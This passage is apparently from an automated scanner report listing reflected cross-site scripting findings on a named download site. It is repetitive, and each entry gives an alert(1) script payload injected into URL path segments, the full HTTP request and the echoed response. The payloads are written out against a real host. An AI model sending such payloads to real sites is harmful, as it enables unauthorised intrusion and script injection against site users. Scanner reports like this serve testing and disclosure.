Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:21 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/68784"><script>alert(1)</script>91cdfef4f9f" />
...[SNIP]...

1.339. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3a2bd"><script>alert(1)</script>bad4adca0ce was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot3a2bd"><script>alert(1)</script>bad4adca0ce/news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21326

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot3a2bd"><script>alert(1)</script>bad4adca0ce/news-file-grabber-download-stclytop.html" />
...[SNIP]...

1.340. http://www.x64bitdownload.com/screenshot/news-file-grabber-download-stclytop.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/news-file-grabber-download-stclytop.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a532"><script>alert(1)</script>a50852b0f49 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/4a532"><script>alert(1)</script>a50852b0f49 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:46 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/4a532"><script>alert(1)</script>a50852b0f49" />
...[SNIP]...

1.341. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d9b4"><script>alert(1)</script>4af4e68853c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot1d9b4"><script>alert(1)</script>4af4e68853c/newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:51 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot1d9b4"><script>alert(1)</script>4af4e68853c/newsgroup-commander-pro-download-rjfsmxpp.html" />
...[SNIP]...

1.342. http://www.x64bitdownload.com/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98e3a"><script>alert(1)</script>f98dca8ff54 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/98e3a"><script>alert(1)</script>f98dca8ff54 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:51:04 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/98e3a"><script>alert(1)</script>f98dca8ff54" />
...[SNIP]...

1.343. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54c84"><script>alert(1)</script>b177d980758 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot54c84"><script>alert(1)</script>b177d980758/ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:47:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21313

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot54c84"><script>alert(1)</script>b177d980758/ozum-download-lhtivuds.html" />
...[SNIP]...

1.344. http://www.x64bitdownload.com/screenshot/ozum-download-lhtivuds.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/ozum-download-lhtivuds.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2a650"><script>alert(1)</script>4eac85a3ec4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/2a650"><script>alert(1)</script>4eac85a3ec4 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:57 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/2a650"><script>alert(1)</script>4eac85a3ec4" />
...[SNIP]...

1.345. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8f05"><script>alert(1)</script>fc2166241bc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshota8f05"><script>alert(1)</script>fc2166241bc/paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:44 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21327

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshota8f05"><script>alert(1)</script>fc2166241bc/paragon-extbrowser-download-xwigzbic.html" />
...[SNIP]...

1.346. http://www.x64bitdownload.com/screenshot/paragon-extbrowser-download-xwigzbic.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/paragon-extbrowser-download-xwigzbic.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b00c"><script>alert(1)</script>9b9d0e5a949 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/7b00c"><script>alert(1)</script>9b9d0e5a949 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:38 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/7b00c"><script>alert(1)</script>9b9d0e5a949" />
...[SNIP]...

1.347. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9be78"><script>alert(1)</script>474c7483424 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot9be78"><script>alert(1)</script>474c7483424/rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21319

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot9be78"><script>alert(1)</script>474c7483424/rss-reader-download-avwkinlm.html" />
...[SNIP]...

1.348. http://www.x64bitdownload.com/screenshot/rss-reader-download-avwkinlm.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/rss-reader-download-avwkinlm.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38eaf"><script>alert(1)</script>7f5c302d424 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/38eaf"><script>alert(1)</script>7f5c302d424 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:50:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/38eaf"><script>alert(1)</script>7f5c302d424" />
...[SNIP]...

1.349. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c38c6"><script>alert(1)</script>235a4421e5d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshotc38c6"><script>alert(1)</script>235a4421e5d/trollkiller-for-firefox-download-ydeukbjf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:40 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21332

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshotc38c6"><script>alert(1)</script>235a4421e5d/trollkiller-for-firefox-download-ydeukbjf.html" />
...[SNIP]...

1.350. http://www.x64bitdownload.com/screenshot/trollkiller-for-firefox-download-ydeukbjf.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/trollkiller-for-firefox-download-ydeukbjf.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71a72"><script>alert(1)</script>406b3b0c339 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/71a72"><script>alert(1)</script>406b3b0c339 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:50:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/71a72"><script>alert(1)</script>406b3b0c339" />
...[SNIP]...

1.351. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 40d9b"><script>alert(1)</script>2df60bcd894 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot40d9b"><script>alert(1)</script>2df60bcd894/usenext-download-rizftkeg.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:36 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot40d9b"><script>alert(1)</script>2df60bcd894/usenext-download-rizftkeg.html" />
...[SNIP]...

1.352. http://www.x64bitdownload.com/screenshot/usenext-download-rizftkeg.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/usenext-download-rizftkeg.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e7d23"><script>alert(1)</script>db205ea7bef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/e7d23"><script>alert(1)</script>db205ea7bef HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:12 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/e7d23"><script>alert(1)</script>db205ea7bef" />
...[SNIP]...

1.353. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da589"><script>alert(1)</script>1e658102b94 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshotda589"><script>alert(1)</script>1e658102b94/web-forum-reader-download-ivzgszuq.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:48:56 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21325

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshotda589"><script>alert(1)</script>1e658102b94/web-forum-reader-download-ivzgszuq.html" />
...[SNIP]...

1.354. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-ivzgszuq.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-ivzgszuq.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ae28f"><script>alert(1)</script>c6d61f2298f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/ae28f"><script>alert(1)</script>c6d61f2298f HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:52 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot/ae28f"><script>alert(1)</script>c6d61f2298f" />
...[SNIP]...

1.355. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b4e7"><script>alert(1)</script>f2581632af was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot3b4e7"><script>alert(1)</script>f2581632af/web-forum-reader-download-sqifmyiy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:02 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21324

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
<input type="hidden" name="retpage" value="/screenshot3b4e7"><script>alert(1)</script>f2581632af/web-forum-reader-download-sqifmyiy.html" />
...[SNIP]...

1.356. http://www.x64bitdownload.com/screenshot/web-forum-reader-download-sqifmyiy.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.x64bitdownload.com
Path:	/screenshot/web-forum-reader-download-sqifmyiy.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4f2b"><script>alert(1)</script>da38c854bdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /screenshot/e4f2b"><script>alert(1)</script>da38c854bdf HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 15:49:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
